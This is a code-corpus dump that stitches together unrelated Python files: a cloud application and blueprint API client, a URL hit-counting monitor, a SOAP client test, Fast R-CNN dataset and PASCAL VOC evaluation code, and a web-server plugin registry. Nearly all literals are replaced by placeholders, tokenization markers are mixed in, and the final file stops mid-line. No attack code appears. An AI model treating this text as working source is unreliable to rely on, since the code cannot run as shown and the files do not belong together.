"""<STR_LIT>""" <EOL> request = deploy or { } <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url , request ) <EOL> def remove_application ( self , application ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT>' , url ) <EOL> def start_vm ( self , application , vm ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( application [ '<STR_LIT:id>' ] , vm [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url ) <EOL> def stop_vm ( self , application , vm ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . 
format ( application [ '<STR_LIT:id>' ] , vm [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT:POST>' , url ) <EOL> def get_blueprint ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> if not response . entity : <EOL> return <EOL> blueprint = response . entity <EOL> blueprint . update ( blueprint . pop ( '<STR_LIT>' ) ) <EOL> return blueprint <EOL> def get_blueprints ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_blueprint ( self , name , application ) : <EOL> """<STR_LIT>""" <EOL> offline = '<STR_LIT:true>' <EOL> for vm in application . get ( '<STR_LIT>' , [ ] ) : <EOL> if vm . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT:state>' ) != '<STR_LIT>' : <EOL> offline = '<STR_LIT:false>' <EOL> break <EOL> request = { '<STR_LIT>' : name , <EOL> '<STR_LIT>' : application [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : offline } <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , request ) <EOL> blueprint = response . entity <EOL> blueprint . update ( blueprint . pop ( '<STR_LIT>' ) ) <EOL> return blueprint <EOL> def remove_blueprint ( self , blueprint ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' . format ( blueprint [ '<STR_LIT:id>' ] ) <EOL> self . _make_request ( '<STR_LIT>' , url ) </s>
<s> import shared <EOL> import socket <EOL> import time <EOL> PROTECT_URL = '<STR_LIT>' <EOL> blah = shared . SecondBucketCounter ( <NUM_LIT> ) <EOL> agg = shared . AggregatorConnector ( ) <EOL> agg . write ( '<STR_LIT>' % PROTECT_URL ) <EOL> def processData ( data ) : <EOL> if data [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> if data [ '<STR_LIT:url>' ] == PROTECT_URL : <EOL> host = data [ '<STR_LIT:host>' ] <EOL> blah . addItem ( host ) <EOL> if blah . checkItem ( host , <NUM_LIT:2> ) : <EOL> agg . write ( "<STR_LIT>" % host ) <EOL> while True : <EOL> for d in agg . json_read ( ) : <EOL> processData ( d ) </s>
<s> from suds . client import Client as SudsClient <EOL> import requests <EOL> url = '<STR_LIT>' <EOL> client = SudsClient ( url = url , cache = None ) <EOL> r = client . service . echo ( str = '<STR_LIT>' , cnt = <NUM_LIT:3> ) <EOL> print r <EOL> r = client . service . answer ( str = '<STR_LIT>' ) <EOL> print r <EOL> url = '<STR_LIT>' <EOL> params = { '<STR_LIT:str>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:3> } <EOL> r = requests . get ( url = url , params = params ) <EOL> print r . text <EOL> url = '<STR_LIT>' <EOL> params = { '<STR_LIT:str>' : '<STR_LIT>' } <EOL> r = requests . get ( url = url , params = params ) <EOL> print r . text </s>
<s> from . import runner </s>
import os
import os.path as osp
import PIL
from utils.cython_bbox import bbox_overlaps
import numpy as np
import scipy.sparse
import datasets


class imdb(object):
    """Image database base class.

    Holds the class list, image index and region-of-interest database
    (roidb); concrete datasets subclass this and implement the
    NotImplementedError stubs.
    """

    def __init__(self, name):
        self._name = name
        self._num_classes = <NUM_LIT:0>
        self._classes = []
        self._image_index = []
        self._obj_proposer = '<STR_LIT>'
        # roidb is built lazily by whatever handler is currently installed.
        self._roidb = None
        self._roidb_handler = self.default_roidb
        self.config = {}

    @property
    def name(self):
        return self._name

    @property
    def num_classes(self):
        # Derived from the class list, not the _num_classes field.
        return len(self._classes)

    @property
    def classes(self):
        return self._classes

    @property
    def image_index(self):
        return self._image_index

    @property
    def roidb_handler(self):
        return self._roidb_handler

    @roidb_handler.setter
    def roidb_handler(self, val):
        self._roidb_handler = val

    @property
    def roidb(self):
        # Lazily build and memoize the roidb via the installed handler.
        if self._roidb is not None:
            return self._roidb
        self._roidb = self.roidb_handler()
        return self._roidb

    @property
    def cache_path(self):
        # Cache directory under the dataset root; created on first access.
        cache_path = osp.abspath(osp.join(datasets.ROOT_DIR, '<STR_LIT:data>', '<STR_LIT>'))
        if not os.path.exists(cache_path):
            os.makedirs(cache_path)
        return cache_path

    @property
    def num_images(self):
        return len(self.image_index)

    def image_path_at(self, i):
        # Subclass responsibility: absolute path of image i.
        raise NotImplementedError

    def default_roidb(self):
        # Subclass responsibility: build the default roidb.
        raise NotImplementedError

    def evaluate_detections(self, all_boxes, output_dir=None):
        """Evaluate detections; subclass responsibility."""
        raise NotImplementedError

    def append_flipped_images(self):
        # Double the dataset with horizontally mirrored roidb entries;
        # image widths are needed to mirror the x coordinates.
        num_images = self.num_images
        widths = [PIL.Image.open(self.image_path_at(i)).size[<NUM_LIT:0>]
                  for i in xrange(num_images)]
        for i in xrange(num_images):
            boxes = self.roidb[i]['<STR_LIT>'].copy()
            oldx1 = boxes[:, <NUM_LIT:0>].copy()
            oldx2 = boxes[:, <NUM_LIT:2>].copy()
            # Mirror x1/x2 about the image width (inclusive pixel coords).
            boxes[:, <NUM_LIT:0>] = widths[i] - oldx2 - <NUM_LIT:1>
            boxes[:, <NUM_LIT:2>] = widths[i] - oldx1 - <NUM_LIT:1>
            assert (boxes[:, <NUM_LIT:2>] >= boxes[:, <NUM_LIT:0>]).all()
            entry = {'<STR_LIT>': boxes,
                     '<STR_LIT>': self.roidb[i]['<STR_LIT>'],
                     '<STR_LIT>': self.roidb[i]['<STR_LIT>'],
                     '<STR_LIT>': True}
            self.roidb.append(entry)
        # Each image index now appears twice: original + flipped.
        self._image_index = self._image_index * <NUM_LIT:2>

    def evaluate_recall(self, candidate_boxes, ar_thresh=<NUM_LIT:0.5>):
        # Greedy one-to-one matching of proposals to ground truth:
        # repeatedly take the globally best remaining (box, gt) pair and
        # invalidate its row/column; collect the matched overlaps.
        gt_overlaps = np.zeros(<NUM_LIT:0>)
        for i in xrange(self.num_images):
            gt_inds = np.where(self.roidb[i]['<STR_LIT>'] > <NUM_LIT:0>)[<NUM_LIT:0>]
            gt_boxes = self.roidb[i]['<STR_LIT>'][gt_inds, :]
            boxes = candidate_boxes[i]
            if boxes.shape[<NUM_LIT:0>] == <NUM_LIT:0>:
                continue
            overlaps = bbox_overlaps(boxes.astype(np.float),
                                     gt_boxes.astype(np.float))
            _gt_overlaps = np.zeros((gt_boxes.shape[<NUM_LIT:0>]))
            for j in xrange(gt_boxes.shape[<NUM_LIT:0>]):
                # Best proposal for each remaining gt, then the gt with the
                # single best match overall.
                argmax_overlaps = overlaps.argmax(axis=<NUM_LIT:0>)
                max_overlaps = overlaps.max(axis=<NUM_LIT:0>)
                gt_ind = max_overlaps.argmax()
                gt_ovr = max_overlaps.max()
                assert (gt_ovr >= <NUM_LIT:0>)
                box_ind = argmax_overlaps[gt_ind]
                _gt_overlaps[j] = overlaps[box_ind, gt_ind]
                assert (_gt_overlaps[j] == gt_ovr)
                # Remove the matched proposal and gt from further matching.
                overlaps[box_ind, :] = -<NUM_LIT:1>
                overlaps[:, gt_ind] = -<NUM_LIT:1>
            gt_overlaps = np.hstack((gt_overlaps, _gt_overlaps))
        num_pos = gt_overlaps.size
        gt_overlaps = np.sort(gt_overlaps)
        # Recall at a sweep of IoU thresholds; AR is twice the area under
        # the recall curve over that threshold range.
        step = <NUM_LIT>
        thresholds = np.minimum(np.arange(<NUM_LIT:0.5>, <NUM_LIT:1.0> + step, step), <NUM_LIT:1.0>)
        recalls = np.zeros_like(thresholds)
        for i, t in enumerate(thresholds):
            recalls[i] = (gt_overlaps >= t).sum() / float(num_pos)
        ar = <NUM_LIT:2> * np.trapz(recalls, thresholds)
        return ar, gt_overlaps, recalls, thresholds

    def create_roidb_from_box_list(self, box_list, gt_roidb):
        # Build a proposal roidb: each proposal gets, per class, the best
        # overlap against any gt box of that class (zero class labels).
        assert len(box_list) == self.num_images, '<STR_LIT>'
        roidb = []
        for i in xrange(self.num_images):
            boxes = box_list[i]
            num_boxes = boxes.shape[<NUM_LIT:0>]
            overlaps = np.zeros((num_boxes, self.num_classes), dtype=np.float32)
            if gt_roidb is not None:
                gt_boxes = gt_roidb[i]['<STR_LIT>']
                gt_classes = gt_roidb[i]['<STR_LIT>']
                gt_overlaps = bbox_overlaps(boxes.astype(np.float),
                                            gt_boxes.astype(np.float))
                argmaxes = gt_overlaps.argmax(axis=<NUM_LIT:1>)
                maxes = gt_overlaps.max(axis=<NUM_LIT:1>)
                I = np.where(maxes > <NUM_LIT:0>)[<NUM_LIT:0>]
                # Record each proposal's max overlap in the column of the
                # class of its best-matching gt box.
                overlaps[I, gt_classes[argmaxes[I]]] = maxes[I]
            overlaps = scipy.sparse.csr_matrix(overlaps)
            roidb.append({'<STR_LIT>': boxes,
                          '<STR_LIT>': np.zeros((num_boxes,),
                                                dtype=np.int32),
                          '<STR_LIT>': overlaps,
                          '<STR_LIT>': False})
        return roidb

    @staticmethod
    def merge_roidbs(a, b):
        # Merge b's entries into a's, image by image (boxes stacked,
        # class vectors and sparse overlap matrices concatenated).
        assert len(a) == len(b)
        for i in xrange(len(a)):
            a[i]['<STR_LIT>'] = np.vstack((a[i]['<STR_LIT>'], b[i]['<STR_LIT>']))
            a[i]['<STR_LIT>'] = np.hstack((a[i]['<STR_LIT>'],
                                           b[i]['<STR_LIT>']))
            a[i]['<STR_LIT>'] = scipy.sparse.vstack([a[i]['<STR_LIT>'],
                                                     b[i]['<STR_LIT>']])
        return a

    def competition_mode(self, on):
        """Toggle dataset-specific competition settings; no-op by default."""
        pass
import xml.etree.ElementTree as ET
import os
import cPickle
import numpy as np


def parse_rec(filename):
    """Parse a PASCAL VOC style XML annotation file.

    Returns a list of dicts, one per annotated object, holding the object
    fields read below plus its 4-element bounding box.
    """
    tree = ET.parse(filename)
    objects = []
    for obj in tree.findall('<STR_LIT:object>'):
        obj_struct = {}
        obj_struct['<STR_LIT:name>'] = obj.find('<STR_LIT:name>').text
        obj_struct['<STR_LIT>'] = obj.find('<STR_LIT>').text
        obj_struct['<STR_LIT>'] = int(obj.find('<STR_LIT>').text)
        obj_struct['<STR_LIT>'] = int(obj.find('<STR_LIT>').text)
        bbox = obj.find('<STR_LIT>')
        obj_struct['<STR_LIT>'] = [int(bbox.find('<STR_LIT>').text),
                                   int(bbox.find('<STR_LIT>').text),
                                   int(bbox.find('<STR_LIT>').text),
                                   int(bbox.find('<STR_LIT>').text)]
        objects.append(obj_struct)
    return objects


def voc_ap(rec, prec, use_07_metric=False):
    """Compute average precision from recall/precision arrays.

    With use_07_metric the VOC-2007 sampled approximation is used
    (mean of max precision at evenly spaced recall points); otherwise the
    exact area under the monotonized precision-recall curve.
    """
    if use_07_metric:
        ap = <NUM_LIT:0.>
        for t in np.arange(<NUM_LIT:0.>, <NUM_LIT>, <NUM_LIT:0.1>):
            if np.sum(rec >= t) == <NUM_LIT:0>:
                p = <NUM_LIT:0>
            else:
                p = np.max(prec[rec >= t])
            ap = ap + p / <NUM_LIT>
    else:
        # Pad the curve, then sweep right-to-left so precision becomes
        # monotonically non-increasing.
        mrec = np.concatenate(([<NUM_LIT:0.>], rec, [<NUM_LIT:1.>]))
        mpre = np.concatenate(([<NUM_LIT:0.>], prec, [<NUM_LIT:0.>]))
        for i in range(mpre.size - <NUM_LIT:1>, <NUM_LIT:0>, -<NUM_LIT:1>):
            mpre[i - <NUM_LIT:1>] = np.maximum(mpre[i - <NUM_LIT:1>], mpre[i])
        # Sum rectangle areas where recall actually changes.
        i = np.where(mrec[<NUM_LIT:1>:] != mrec[:-<NUM_LIT:1>])[<NUM_LIT:0>]
        ap = np.sum((mrec[i + <NUM_LIT:1>] - mrec[i]) * mpre[i + <NUM_LIT:1>])
    return ap


def voc_eval(detpath,
             annopath,
             imagesetfile,
             classname,
             cachedir,
             ovthresh=<NUM_LIT:0.5>,
             use_07_metric=False):
    """Evaluate one class of detections against VOC annotations.

    Reads (and caches via cPickle) the per-image annotations, matches each
    detection to ground truth greedily by confidence, and returns
    (recall, precision, average precision).
    """
    if not os.path.isdir(cachedir):
        os.mkdir(cachedir)
    cachefile = os.path.join(cachedir, '<STR_LIT>')
    with open(imagesetfile, '<STR_LIT:r>') as f:
        lines = f.readlines()
    imagenames = [x.strip() for x in lines]
    if not os.path.isfile(cachefile):
        # First run: parse every annotation file and cache the result.
        recs = {}
        for i, imagename in enumerate(imagenames):
            recs[imagename] = parse_rec(annopath.format(imagename))
            if i % <NUM_LIT:100> == <NUM_LIT:0>:
                print '<STR_LIT>'.format(
                    i + <NUM_LIT:1>, len(imagenames))
        print '<STR_LIT>'.format(cachefile)
        with open(cachefile, '<STR_LIT:w>') as f:
            cPickle.dump(recs, f)
    else:
        with open(cachefile, '<STR_LIT:r>') as f:
            recs = cPickle.load(f)
    # Extract per-image ground truth for the requested class; npos counts
    # only non-difficult objects (difficult ones never count as FP or TP).
    class_recs = {}
    npos = <NUM_LIT:0>
    for imagename in imagenames:
        R = [obj for obj in recs[imagename] if obj['<STR_LIT:name>'] == classname]
        bbox = np.array([x['<STR_LIT>'] for x in R])
        difficult = np.array([x['<STR_LIT>'] for x in R]).astype(np.bool)
        det = [False] * len(R)
        npos = npos + sum(~difficult)
        class_recs[imagename] = {'<STR_LIT>': bbox,
                                 '<STR_LIT>': difficult,
                                 '<STR_LIT>': det}
    # Load detections: one line per box as "image_id confidence x1 y1 x2 y2".
    detfile = detpath.format(classname)
    with open(detfile, '<STR_LIT:r>') as f:
        lines = f.readlines()
    splitlines = [x.strip().split('<STR_LIT:U+0020>') for x in lines]
    image_ids = [x[<NUM_LIT:0>] for x in splitlines]
    confidence = np.array([float(x[<NUM_LIT:1>]) for x in splitlines])
    BB = np.array([[float(z) for z in x[<NUM_LIT:2>:]] for x in splitlines])
    # Process detections in decreasing confidence order.
    sorted_ind = np.argsort(-confidence)
    sorted_scores = np.sort(-confidence)
    BB = BB[sorted_ind, :]
    image_ids = [image_ids[x] for x in sorted_ind]
    nd = len(image_ids)
    tp = np.zeros(nd)
    fp = np.zeros(nd)
    for d in range(nd):
        R = class_recs[image_ids[d]]
        bb = BB[d, :].astype(float)
        ovmax = -np.inf
        BBGT = R['<STR_LIT>'].astype(float)
        if BBGT.size > <NUM_LIT:0>:
            # IoU of this detection against every gt box in the image
            # (inclusive pixel coordinates, hence the +1 terms).
            ixmin = np.maximum(BBGT[:, <NUM_LIT:0>], bb[<NUM_LIT:0>])
            iymin = np.maximum(BBGT[:, <NUM_LIT:1>], bb[<NUM_LIT:1>])
            ixmax = np.minimum(BBGT[:, <NUM_LIT:2>], bb[<NUM_LIT:2>])
            iymax = np.minimum(BBGT[:, <NUM_LIT:3>], bb[<NUM_LIT:3>])
            iw = np.maximum(ixmax - ixmin + <NUM_LIT:1.>, <NUM_LIT:0.>)
            ih = np.maximum(iymax - iymin + <NUM_LIT:1.>, <NUM_LIT:0.>)
            inters = iw * ih
            uni = ((bb[<NUM_LIT:2>] - bb[<NUM_LIT:0>] + <NUM_LIT:1.>) * (bb[<NUM_LIT:3>] - bb[<NUM_LIT:1>] + <NUM_LIT:1.>) +
                   (BBGT[:, <NUM_LIT:2>] - BBGT[:, <NUM_LIT:0>] + <NUM_LIT:1.>) *
                   (BBGT[:, <NUM_LIT:3>] - BBGT[:, <NUM_LIT:1>] + <NUM_LIT:1.>) - inters)
            overlaps = inters / uni
            ovmax = np.max(overlaps)
            jmax = np.argmax(overlaps)
        if ovmax > ovthresh:
            if not R['<STR_LIT>'][jmax]:
                if not R['<STR_LIT>'][jmax]:
                    # First sufficiently-overlapping match: true positive,
                    # and mark the gt box as claimed.
                    tp[d] = <NUM_LIT:1.>
                    R['<STR_LIT>'][jmax] = <NUM_LIT:1>
                else:
                    # Gt box already claimed: duplicate detection.
                    fp[d] = <NUM_LIT:1.>
        else:
            fp[d] = <NUM_LIT:1.>
    # Cumulative counts give the precision/recall curve over the ranking.
    fp = np.cumsum(fp)
    tp = np.cumsum(tp)
    rec = tp / float(npos)
    # Guard against divide-by-zero when no detections have been ranked yet.
    prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
    ap = voc_ap(rec, prec, use_07_metric)
    return rec, prec, ap
"""Test a Fast R-CNN network on an image database."""
import _init_paths
from fast_rcnn.test import test_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys


def parse_args():
    """Parse command line arguments; print help and exit if none given."""
    parser = argparse.ArgumentParser(description='<STR_LIT>')
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>', help='<STR_LIT>',
                        default=<NUM_LIT:0>, type=int)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>',
                        default=None, type=str)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>',
                        default=None, type=str)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>', default=None, type=str)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>',
                        default=True, type=bool)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>',
                        default='<STR_LIT>', type=str)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>', help='<STR_LIT>',
                        action='<STR_LIT:store_true>')
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>', default=None,
                        nargs=argparse.REMAINDER)
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>', help='<STR_LIT>',
                        action='<STR_LIT:store_true>')
    parser.add_argument('<STR_LIT>', dest='<STR_LIT>',
                        help='<STR_LIT>',
                        default=<NUM_LIT:100>, type=int)
    # No arguments at all: show usage instead of running with defaults.
    if len(sys.argv) == <NUM_LIT:1>:
        parser.print_help()
        sys.exit(<NUM_LIT:1>)
    args = parser.parse_args()
    return args


if __name__ == '<STR_LIT:__main__>':
    args = parse_args()
    print('<STR_LIT>')
    print(args)
    # Config file values are applied first, then per-flag overrides.
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    print('<STR_LIT>')
    pprint.pprint(cfg)
    # Optionally poll until the snapshot file appears (training may still
    # be writing it).
    while not os.path.exists(args.caffemodel) and args.wait:
        print('<STR_LIT>'.format(args.caffemodel))
        time.sleep(<NUM_LIT:10>)
    caffe.set_mode_gpu()
    caffe.set_device(args.gpu_id)
    net = caffe.Net(args.prototxt, args.caffemodel, caffe.TEST)
    # Name the net after the snapshot file (sans extension) for reporting.
    net.name = os.path.splitext(os.path.basename(args.caffemodel))[<NUM_LIT:0>]
    imdb = get_imdb(args.imdb_name)
    imdb.competition_mode(args.comp_mode)
    if not cfg.TEST.HAS_RPN:
        imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
    test_net(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
from serializable import Serializable


class StatusView(Serializable):
    """Serializable snapshot of a user's overall and per-session stats."""

    def __init__(self, username, total_commands, total_sessions,
                 total_systems, total_commands_today, session_name,
                 session_start_time, session_total_commands):
        # Every constructor argument maps 1:1 onto an attribute of the
        # same name; bind them in declaration order.
        values = (username, total_commands, total_sessions,
                  total_systems, total_commands_today, session_name,
                  session_start_time, session_total_commands)
        names = ('username', 'total_commands', 'total_sessions',
                 'total_systems', 'total_commands_today', 'session_name',
                 'session_start_time', 'session_total_commands')
        for attr, value in zip(names, values):
            setattr(self, attr, value)
<s> import logging <EOL> import os <EOL> log = logging . getLogger ( "<STR_LIT>" ) <EOL> SEQUENCE_FIRST = <NUM_LIT:1000> <EOL> SEQUENCE_EARLY = <NUM_LIT> <EOL> SEQUENCE_NORMAL = <NUM_LIT> <EOL> SEQUENCE_LATE = <NUM_LIT:200> <EOL> SEQUENCE_LAST = <NUM_LIT:0> <EOL> class PluginBase ( object ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> self . sequence = seq <EOL> self . name = name <EOL> def __cmp__ ( self , other ) : <EOL> return other . sequence - self . sequence <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . sequence ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def plug_init ( self , server ) : <EOL> pass <EOL> class ServerPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_serverStart ( self , server ) : <EOL> pass <EOL> def plug_serverStop ( self , server ) : <EOL> pass <EOL> def plug_sessionCreated ( self , webapp , session , request ) : <EOL> pass <EOL> def plug_sessionDestroyed ( self , webapp , session , request ) : <EOL> pass <EOL> class PageProcessorPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_getPageProcessor ( self , webapp , handler , url , pathpart , query ) : <EOL> return None <EOL> class RequestPlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . __init__ ( self , seq , name ) <EOL> def plug_requestExecute ( self , webapp , snakelet , request , response ) : <EOL> return False <EOL> def plug_requestFinished ( self , webapp , snakelet , request , response , outputarray = [ None ] ) : <EOL> return False <EOL> class ErrorpagePlugin ( PluginBase ) : <EOL> def __init__ ( self , seq = SEQUENCE_NORMAL , name = None ) : <EOL> PluginBase . 
__init__ ( self , seq , name ) <EOL> def plug_serverErrorpage ( self , path , code , message , explainTxt , outputStream ) : <EOL> return False <EOL> class SortedPluginDict ( dict ) : <EOL> def __init__ ( self , * args ) : <EOL> self . sortedlist = [ ] <EOL> dict . __init__ ( self , * args ) <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key , value ) <EOL> self . sortedlist = self . values ( ) <EOL> self . sortedlist . sort ( ) <EOL> PLUGINDIR = "<STR_LIT>" <EOL> class PluginRegistry ( object ) : <EOL> def __init__ ( self ) : <EOL> self . serverPlugins = SortedPluginDict ( ) <EOL> self . requestPlugins = SortedPluginDict ( ) <EOL> self . errorpagePlugins = SortedPluginDict ( ) <EOL> self . pageProcessorPlugins = SortedPluginDict ( ) <EOL> self . webapps = { } <EOL> def load ( self , server ) : <EOL> log . info ( "<STR_LIT>" ) <EOL> self . server = server <EOL> path = os . path . abspath ( __file__ ) <EOL> path = os . path . join ( os . path . split ( path ) [ <NUM_LIT:0> ] , PLUGINDIR ) <EOL> for fn in os . listdir ( path ) : <EOL> fullfn = os . path . join ( path , fn ) <EOL> if os . path . isdir ( fullfn ) : <EOL> if fn == "<STR_LIT>" or fn == "<STR_LIT>" : <EOL> continue <EOL> log . info ( "<STR_LIT>" , fn ) <EOL> try : <EOL> module = __import__ ( "<STR_LIT>" % fn , locals ( ) ) <EOL> module = getattr ( module . plugins , fn ) <EOL> enabled = getattr ( module , "<STR_LIT>" , True ) <EOL> if enabled and module . PLUGINS : <EOL> for pluginname in module . PLUGINS : <EOL> log . info ( "<STR_LIT>" + pluginname ) <EOL> clazz = getattr ( module , pluginname ) <EOL> plugin = clazz ( ) <EOL> othername = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> if othername : <EOL> pluginname = othername <EOL> plugin . name = pluginname <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( self . server ) <EOL> self . 
__getPluginCategory ( clazz ) [ pluginname ] = plugin <EOL> self . webapps [ pluginname ] = None <EOL> except Exception , x : <EOL> log . error ( "<STR_LIT>" , fn , x ) <EOL> raise <EOL> def addPlugin ( self , webapp , plugin ) : <EOL> if not isinstance ( plugin , PluginBase ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> category = self . __getPluginCategory ( plugin . __class__ ) <EOL> plugin . name = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> plugin . name = name = webapp . getName ( ) [ <NUM_LIT:0> ] + "<STR_LIT:/>" + ( plugin . name or plugin . __class__ . __name__ ) <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( webapp . server ) <EOL> if name in self . webapps : <EOL> raise ValueError ( "<STR_LIT>" + name ) <EOL> category [ name ] = plugin <EOL> self . webapps [ name ] = webapp . getName ( ) <EOL> def _addServerPlugin ( self , server , plugin ) : <EOL> if not isinstance ( plugin , PluginBase ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> category = self . __getPluginCategory ( plugin . __class__ ) <EOL> plugin . name = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT:name>" ) ) <EOL> plugin . name = name = plugin . name or plugin . __class__ . __name__ <EOL> plugin . sequence = getattr ( plugin , "<STR_LIT>" , getattr ( plugin , "<STR_LIT>" ) ) <EOL> plugin . plug_init ( server ) <EOL> if name in self . webapps : <EOL> raise ValueError ( "<STR_LIT>" + name ) <EOL> category [ name ] = plugin <EOL> self . webapps [ name ] = None <EOL> def getPlugin ( self , name ) : <EOL> if self . serverPlugins . has_key ( name ) : <EOL> return self . serverPlugins [ name ] <EOL> elif self . pageProcessorPlugins . has_key ( name ) : <EOL> return self . pageProcessorPlugins [ name ] <EOL> elif self . requestPlugins . has_key ( name ) : <EOL> return self . requestPlugins [ name ] <EOL> elif self . errorpagePlugins . has_key ( name ) : <EOL> return self . 
errorpagePlugins [ name ] <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" + name ) <EOL> def getPluginNames ( self ) : <EOL> return self . serverPlugins . keys ( ) + self . pageProcessorPlugins . keys ( ) + self . requestPlugins . keys ( ) + self . errorpagePlugins . keys ( ) <EOL> def __getPluginCategory ( self , pluginclass ) : <EOL> if issubclass ( pluginclass , ServerPlugin ) : <EOL> return self . serverPlugins <EOL> elif issubclass ( pluginclass , PageProcessorPlugin ) : <EOL> return self . pageProcessorPlugins <EOL> elif issubclass ( pluginclass , RequestPlugin ) : <EOL> return self . requestPlugins <EOL> elif issubclass ( pluginclass , ErrorpagePlugin ) : <EOL> return self . errorpagePlugins <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" + str ( pluginclass ) ) <EOL> def __doall ( self , plugins , pluginMethod , * args ) : <EOL> for plugin in plugins : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> method ( * args ) <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> def __doall_returnval ( self , plugins , pluginMethod , * args ) : <EOL> for plugin in plugins : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> result = method ( * args ) <EOL> if result not in ( False , None ) : <EOL> return result <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> return None <EOL> def __doall_WA_returnval ( self , plugins , pluginMethod , webapp , * args ) : <EOL> webappname = webapp . getName ( ) <EOL> for plugin in plugins : <EOL> if self . webapps [ plugin . name ] in ( None , webappname ) : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> result = method ( webapp , * args ) <EOL> if result not in ( False , None ) : <EOL> return result <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . 
__name__ , x ) <EOL> return None <EOL> def __doall_WA ( self , plugins , pluginMethod , webapp , * args ) : <EOL> webappname = webapp . getName ( ) <EOL> for plugin in plugins : <EOL> if self . webapps [ plugin . name ] in ( None , webappname ) : <EOL> method = getattr ( plugin , pluginMethod ) <EOL> try : <EOL> method ( webapp , * args ) <EOL> except Exception , x : <EOL> log . warn ( "<STR_LIT>" , pluginMethod , plugin . name , x . __class__ . __name__ , x ) <EOL> def serverStart ( self ) : <EOL> self . __doall ( self . serverPlugins . sortedlist , "<STR_LIT>" , self . server ) <EOL> def serverStop ( self ) : <EOL> log . info ( "<STR_LIT>" ) <EOL> self . __doall ( self . serverPlugins . sortedlist , "<STR_LIT>" , self . server ) <EOL> def sessionCreated ( self , webapp , session , request ) : <EOL> self . __doall_WA ( self . serverPlugins . sortedlist , "<STR_LIT>" , webapp , session , request ) <EOL> def sessionDestroyed ( self , webapp , session , request ) : <EOL> self . __doall_WA ( self . serverPlugins . sortedlist , "<STR_LIT>" , webapp , session , request ) <EOL> def serverErrorpage ( self , path , code , message , explain , output ) : <EOL> return self . __doall_returnval ( self . errorpagePlugins . sortedlist , "<STR_LIT>" , path , code , message , explain , output ) <EOL> def getPageProcessor ( self , webapp , handler , url , pathpart , query ) : <EOL> return self . __doall_WA_returnval ( self . pageProcessorPlugins . sortedlist , "<STR_LIT>" , webapp , handler , url , pathpart , query ) <EOL> def requestExecute ( self , webapp , snakelet , request , response ) : <EOL> return self . __doall_WA_returnval ( self . requestPlugins . 